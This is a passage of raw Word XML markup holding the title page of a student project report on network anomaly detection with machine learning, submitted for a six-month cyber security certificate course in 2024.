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media/image2.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/word/header14.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footer14.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/media/image3.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/word/header15.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footer15.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/media/image4.jpeg" ContentType="image/jpeg"/>
  <Override PartName="/word/media/image5.jpeg" ContentType="image/jpeg"/>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spacing w:before="76" w:line="242" w:lineRule="auto"/>
        <w:ind w:right="1499"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="833a09"/>
          <w:u w:color="833a09"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="833A09"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>NETWORK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="833a09"/>
          <w:spacing w:val="0"/>
          <w:u w:color="833a09"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="833A09"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="833a09"/>
          <w:u w:color="833a09"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="833A09"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ANOMALY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="833a09"/>
          <w:spacing w:val="0"/>
          <w:u w:color="833a09"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="833A09"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="833a09"/>
          <w:u w:color="833a09"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="da-DK"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="833A09"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>DETECTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="833a09"/>
          <w:spacing w:val="0"/>
          <w:u w:color="833a09"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="833A09"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:outline w:val="0"/>
          <w:color w:val="833a09"/>
          <w:u w:color="833a09"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="833A09"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>USING MACHINE LEARNING TECHNIQUES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="314"/>
        <w:ind w:left="289" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>PROJECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:spacing w:val="47"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="1f3862"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="1f3862"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1F3862"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="194" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Submitted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>partial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>fulfillment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="001f5f"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:color="001f5f"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="001F5F"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>the requirementsfor award of the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Six</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:spacing w:val="-13"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Months</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:spacing w:val="-11"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:spacing w:val="-10"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Certificate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:spacing w:val="-12"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:outline w:val="0"/>
          <w:color w:val="ff0066"/>
          <w:spacing w:val="0"/>
          <w:u w:color="ff0066"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0066"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Course</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:line="332" w:lineRule="exact"/>
        <w:ind w:left="205" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:line="442" w:lineRule="exact"/>
        <w:ind w:right="1067"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="1d16aa"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:color="1d16aa"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1D16AA"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Cyber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="1d16aa"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:color="1d16aa"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1D16AA"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="1d16aa"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:color="1d16aa"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="1D16AA"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:before="35"/>
        <w:ind w:right="1070"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:u w:color="ff0000"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Course</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:u w:color="ff0000"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:u w:color="ff0000"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Duration:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:u w:color="ff0000"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:u w:color="ff0000"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>[22-01-2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:u w:color="ff0000"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:u w:color="ff0000"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:u w:color="ff0000"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:u w:color="ff0000"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>21-07-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:outline w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:spacing w:val="0"/>
          <w:u w:color="ff0000"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="FF0000"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>2024]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="317"/>
        <w:ind w:left="27" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:ind w:right="3072"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pedagadi Vaishnavi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(Ht.No. HT:NO-2406CYS112)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:ind w:left="204" w:right="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
